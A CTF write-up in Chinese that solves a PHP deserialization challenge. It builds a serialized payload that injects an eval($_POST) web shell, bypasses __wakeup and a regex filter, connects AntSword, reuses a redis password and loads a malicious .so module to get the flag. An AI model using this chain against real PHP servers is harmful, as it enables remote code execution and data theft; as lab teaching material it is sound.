审计代码
这是A类
其中_call方法会在A类中无其他方法执行,为避免报错时执行
其中的eval()会对括号内的命令进行执行
_wakeup会使得code为空是我们要避免的。我们可以在序列化后对属性进行增加来跳过
class A{
public $code = "";
function __call($method,$args){
eval($this->code);
}
function __wakeup(){
$this->code = "";
}
}
这是B类
在反序列化时会,_destruct()方法会执行a中的a()方法
class B{
function __destruct(){
echo $this->a->a();
}
}
这是主体部分
在接收poc的内容后会进行判空,然后对BA进行全局正则匹配,匹配结果以数组形式记录下来。
之后会用if语句来判断匹配成功次数
if(isset($_REQUEST['poc'])){
preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
if (isset($ret[1])) {
foreach ($ret[1] as $i) {
if(intval($i)!==1){
exit("you want to bypass wakeup ? no !");
}
}
unserialize($_REQUEST['poc']);
}
}else{
highlight_file(__FILE__);
}
构造代码
下面我们就要构造代码了,思路是这样的:先构造B类添加一个public $a, 而这个a是一个A类。当我们执行B类中的_destruct()方法时,我们就会去执行A类中的a()方法,由于没有a()于是就会自动执行_call方法。这是我们只要将我们想执行的指令赋给code就行了。
这是代码及序列化后的结果
O:1:"B":1:{s:1:"a";O:1:"A":1:{s:4:"code";s:19:"eval($_POST['1']); ";}}
为绕过_wakeup我们将A后的属性加1,为只进行一次正则匹配我们将A变成a(PHP代码中类名大小写都行)
O:1:"B":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:19:"eval($_POST['1']); ";}}
之后我试图用 ?poc=O:1:"B":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:19:"eval($_POST['1']); ";}}连接蚁剑时发现不行于是将其输入url注入栏变成下列后在用来连接蚁剑才成功。
?poc=O:1:"B":1:%7Bs:1:"a";O:1:"A":1:%7Bs:4:"code";s:19:"eval($_POST['1']);%20";%7D%7D
现在我们开始连接蚁剑
连接成功后我们可以在config.php中发现一个redis库的密码you_cannot_guess_it
为获取redis中的内容我们需要先通过蚁剑来上传一个恶意so文件。之后我们需要在蚁剑中添加redis的插件插件添加完成后加载恶意so文件获取库目录下面的flag
这是上传恶意so文件
打开redis插件
添加并输入连接密码
打开后我们加载恶意so文件加载成功后我们输入相应指令便可获得flag